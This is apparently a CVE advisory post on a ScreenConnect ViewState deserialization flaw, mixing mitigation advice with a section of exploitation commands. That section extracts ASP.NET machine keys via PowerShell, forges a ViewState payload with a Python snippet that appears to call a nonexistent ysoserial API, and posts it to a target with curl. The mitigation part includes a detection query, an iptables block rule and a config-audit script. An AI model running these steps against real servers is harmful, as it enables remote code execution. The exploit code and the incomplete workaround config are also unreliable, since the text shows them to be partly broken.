ScreenConnect, ViewState Code Injection, CVE-2025-3935 (Critical)


How CVE-2025-3935 Works

CVE-2025-3935 exploits ASP.NET's ViewState deserialization in ScreenConnect (versions ≤25.2.3). ViewState stores server control state as Base64-encoded serialized objects, protected by a MAC (Message Authentication Code) computed with the machine keys. An attacker who has stolen the machine keys can forge a malicious ViewState payload that passes MAC validation. When the server deserializes it, the crafted ObjectStateFormatter payload executes arbitrary code in the context of the IIS worker process. ScreenConnect 2025.4 mitigates this by disabling ViewState entirely, removing the attack surface.

DailyCVE Form

Platform: ScreenConnect
Version: ≤25.2.3
Vulnerability: ViewState RCE
Severity: Critical
Date: 06/03/2025

Prediction: Patch: 2025.4 (Released)

What Undercode Say:

Exploitation Commands

1. Extract Machine Key (Requires admin):

Get-ChildItem "HKLM:\SOFTWARE\Microsoft\ASP.NET\4.0.30319.0" -Recurse | Where-Object { $_.Name -like "MachineKey" } | Select-Object Name, Property

2. Generate Malicious ViewState (Python):

import base64
from ysoserial import generate
payload = generate("ObjectStateFormatter", "calc.exe")
viewstate = base64.b64encode(payload).decode()
print(f"__VIEWSTATE={viewstate}")

3. Curl Exploit:

curl -X POST "https://target/connect" --data "__VIEWSTATE=<malicious_base64>" --cookie "ASP.NET_SessionId=..."

Mitigation Steps

1. Immediate Patch:

winget upgrade --id ConnectWise.ScreenConnect --version 2025.4

2. Manual Workaround (Pre-patch):

<configuration>
  <system.web>
    <machineKey validation="SHA1" decryption="AES" compatibilityMode="Framework45" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
  </system.web>
</configuration>

3. Log Monitoring (Detect Exploits):

Get-WinEvent -LogName "Application" -FilterXPath "*[System[EventID=1309]]" | Where-Object { $_.Message -like "*ViewState*" }

4. Network Protection (the string match only sees cleartext; it cannot inspect TLS-encrypted traffic on port 443):

iptables -A INPUT -p tcp --dport 443 -m string --string "__VIEWSTATE=" --algo bm -j DROP
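
A check for the settings named in the manual workaround and in the patch diff, added here as an example (it is not ScreenConnect or ConnectWise code). The function name `audit_viewstate` and both sample configs are constructed for illustration; the attribute defaults it assumes are the standard ASP.NET ones.

```python
import xml.etree.ElementTree as ET

# Constructed sample configs (not taken from a real ScreenConnect install).
WEAK_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0123ABCD" decryptionKey="4567EF01" validation="SHA1" />
    <pages enableViewState="true" enableViewStateMac="false" />
  </system.web>
</configuration>"""

HARDENED_CONFIG = """<configuration>
  <system.web>
    <machineKey validation="SHA1" decryption="AES" compatibilityMode="Framework45" />
    <pages enableViewState="false" enableViewStateMac="true" viewStateEncryptionMode="Always" />
  </system.web>
</configuration>"""


def audit_viewstate(config_xml):
    """Return a list of findings for ViewState-related settings in a web.config."""
    root = ET.fromstring(config_xml)
    findings = []
    for web in root.iter("system.web"):
        pages = web.find("pages")
        attrs = pages.attrib if pages is not None else {}
        # ASP.NET defaults: enableViewState=true, viewStateEncryptionMode=Auto.
        if attrs.get("enableViewState", "true").lower() != "false":
            findings.append("ViewState enabled (the patch diff sets enableViewState=false)")
        if attrs.get("enableViewStateMac", "true").lower() == "false":
            findings.append("enableViewStateMac=false: MAC validation switched off in config")
        if attrs.get("viewStateEncryptionMode", "Auto") != "Always":
            findings.append("viewStateEncryptionMode is not Always")
        key = web.find("machineKey")
        if key is not None:
            for name in ("validationKey", "decryptionKey"):
                value = key.get(name, "AutoGenerate")
                # A literal key in the file is exposed to anyone who can read the file.
                if not value.startswith("AutoGenerate"):
                    findings.append(f"{name} is hard-coded in web.config")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_viewstate(cfg) or "no findings")
```

Run against the workaround config from step 2 exactly as written, it still reports ViewState as enabled, because that snippet does not set `enableViewState`.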

Code Analysis

  • Vulnerable Component: `System.Web.UI.ObjectStateFormatter.Deserialize()`
    – Patch Diff:

    - <pages enableViewState="true">
    + <pages enableViewState="false">

References

Sources:

Reported By: nvd.nist.gov